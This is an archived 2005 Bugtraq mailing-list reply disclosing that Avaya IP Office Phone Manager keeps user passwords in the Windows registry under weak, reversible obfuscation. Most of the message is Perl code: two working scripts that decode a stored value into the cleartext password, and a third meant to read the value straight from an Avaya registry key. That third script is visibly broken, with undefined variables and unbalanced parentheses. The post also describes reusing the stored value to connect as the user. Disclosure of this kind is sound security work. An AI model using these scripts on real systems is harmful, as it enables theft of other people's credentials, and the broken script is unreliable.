lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20050222190608.GI27353@entheta.jingojango.net>
Date: Tue, 22 Feb 2005 11:06:08 -0800
From: grutz@...gojango.net
To: bugtraq@...urityfocus.com
Subject: Re: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability


On Tue, Feb 22, 2005 at 11:29:52PM -0000, m123303@...hmond.ac.uk wrote:
> I suspect there is a vulnerability in Avaya IP Office Phone Manager

You suspect correctly.

>From some research we did with this product:

http://www.avaya.com/gcm/master-usa/en-us/products/offers/softphone.htm

> [HKEY_LOCAL_MACHINE\SOFTWARE\Avaya\IP400\Generic]
> "UserName"="Joe Smith"
> "Password"=""
> "PBXAddress"="10.154.1.60"

Our values were found in a different registry location but i'm willing to bet
the obfuscation is the same. One method of attack is to simply place the stored 
password in your own registry and hit connect. It's only there because people
are lazy and just want their phones to work. It's easily reversable:

 ----- 8< --- [ snippy snippy bad code ] --- >8 ----

#!/usr/bin/perl
$avayapw=shift;

my $pwlength = ord(substr($avayapw, 0, 1)) - 33;
my $startpoint = ($pwlength * 7) % 55;

print "Password length: $pwlength\n";
print " Start position: $startpoint\n";

print "\nYour password is: " . substr($avayapw, $startpoint, 1);
my $byte = $startpoint;
for ( my $a = 1; $a<$pwlength; $a++) {
  $nextbyte = $byte - 7;
  if ($nextbyte < 0) {
    $nextbyte = 55 - (7 - $byte);
  }
  $byte = $nextbyte;
  print substr($avayapw, $byte, 1);
}

 ----- 8< --- [ snippy snippy bad code ] --- >8 ----

Shorter:

#!/usr/bin/perl
$a=shift;
$l=ord(substr($a,0,1))-33;
for $c ( 1 .. $l ) {
  print substr($a, (((($l-$c)+1)*7)%55), 1);
}

 ----- 8< --- [ snippy snippy bad code ] --- >8 ----

And something more fun:

#!/usr/bin/perl

use Win32::Registry;

$::HKEY_CURRENT_USER->Open("Software\\Avaya\\iClarity\\Options", $hKey) or die "Can't open: $^E\n";
$l=ord(substr($value,0,1))-33;
for $c ( 1 .. $l ) {
  print substr($a, (((($l-$c)+1)*7%55), 1);
}




-- 
              ..:[ grutz at jingojango dot net ]:..
 GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
       "There's just no amusing way to say, 'I have a CISSP'."



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ